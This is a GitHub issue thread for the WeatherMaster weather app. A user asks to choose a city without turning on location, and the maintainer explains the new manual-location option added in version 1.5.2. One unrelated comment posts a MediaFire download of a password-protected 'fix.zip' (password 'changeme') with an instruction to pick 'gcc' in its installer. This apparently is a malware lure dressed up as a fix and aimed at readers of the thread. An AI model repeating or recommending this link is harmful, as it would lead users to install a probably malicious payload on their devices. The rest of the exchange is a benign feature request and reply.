### ISSUE TITLE
Show weather data without Location turned on

### ISSUE THREAD

**Issue by schmurian** [PranshulGG/WeatherMaster#8]
I really love the design of this app.
I would like to use it without the need of turning on GPS/Location, but with a selected City instead.
Currently, if location service is turned off, the app loads forever.

Thank you

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PranshulGG** [comment]
> I really love the design of this app. I would like to use it without the need of turning on GPS/Location, but with a selected City instead. Currently, if location service is turned off, the app loads forever.
> 
> Thank you

Thank you for your feedback! I'll add an option to manually select a city without needing to enable GPS.

**Comment by PranshulGG** [comment]
> I really love the design of this app. I would like to use it without the need of turning on GPS/Location, but with a selected City instead. Currently, if location service is turned off, the app loads forever.
> 
> Thank you

Update the app to 1.5.2 deny the permission open search and choose what location you want save it and open settings chose that as your home location

<img  src="https://github.com/user-attachments/assets/7adf1f8f-f9d3-43c7-935c-214c821c999f" width="30%"/>
<img  src="https://github.com/user-attachments/assets/a2574e0e-7619-4b3b-8a2f-62995c76f1d2" width="30%"/>

**Comment by schmurian** [comment]
Nice, thank you!
